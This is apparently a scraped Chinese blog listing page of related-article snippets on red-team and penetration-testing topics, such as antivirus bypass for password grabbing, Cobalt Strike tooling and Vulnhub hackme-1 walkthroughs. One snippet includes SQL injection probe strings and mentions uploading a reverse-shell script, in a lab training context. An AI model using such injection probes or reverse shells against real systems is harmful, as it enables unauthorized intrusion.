红队技巧:绕过ESET_NOD32抓取密码1
红队笔记:技巧,窍门和技巧的串联
02-25
红队笔记 提示,技巧和技巧的串联。 当前主题:文件传输
RedTeamCSharpScripts:红队使用的C#脚本
05-03
红队使用的C#脚本。 这些二进制文件可以由Cobalt Strike执行汇编使用,也可以作为独立的可执行文件使用。 LDAP实用程序 LDAP实用程序包含多个LDAP查询,这些查询将返回您正在寻找的所有有价值的信息。 该实用程序...
Vulnhub--hackme1
weixin_45168704的博客
06-12 76
hackme1靶机渗透流程
靶场-hackeme1
weixin_58602402的博客
06-12 120
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
hackme-1靶机渗透详解
大熊
06-12 377
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
web安全测试之appscan – “X-Content-Type-Options”头缺失或不安全
Programming
06-05 6557
web安全测试之appscan - “X-Content-Type-Options”头缺失或不安全 - 猿码设计师web 安全测试 appscan; 通过设置"X-Content-Type-Options: nosniff"响应标头,对 script 和 styleSheet 在执行是通过MIME 类型来过滤掉不安全的文件。https://www.yuanmadesign.com/ymdesign/appscan-web-test2Appscan是一款安全漏洞扫描软件,由IBM公司研发,后又被卖给了印度公司
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5881
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
基于Web的漏洞利用
weixin_33948416的博客
08-07 989
1、Nikto 基于Web的漏洞信息扫描 nikto 自动扫描web服务器上没有打补丁的软件,同时同时也检测驻留在服务器上的危险文件,nikto能够识别出特定的问题,检测服务器的配置问题, 检测某台主机的端口 - Nikto v2.1.6/2.1.5+ Target Host: 116.255.235.9+ Target Port: 80+ GET...
【靶机渗透】HACKME: 1
安全狐
07-19 881
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
72、任务72——扫描工具Nikto(附带Httrack)
qwsn
02-18 2823
0x01、实验环境 1、靶机:Metasploitable(192.168.97.140) 浏览器访问:http://192.168.97.140/dvwa Username=admin Password=password 2、攻击机:kali(192.168.97.129) 0x02、Httrack工具 1、Httrack:是一种专门针对Web服务器的一种工具 //其可以把站点下所有文件拷...
“Content-Security-Policy”头缺失或不安全
热门推荐
(ง •_•)ง
11-23 1万+
中间件为IIS,网站根目录下找到“web.cofig”文件,没有则新建该文件。复制以下代码,粘贴到web.cofig文件中(新建全部复制,已有复制system.webserver) <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <httpProtoc...
cobaltstrike插件:lstr
最新发布
09-10
插件还提供了实施红队渗透测试所需的各种功能,例如创建带有System权限的服务、使用针对Windows凭据的Hashcat模块等。 总之,CobaltStrike插件:lstr是一个强大的插件,为渗透测试和红队行动提供了一系列功能。它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值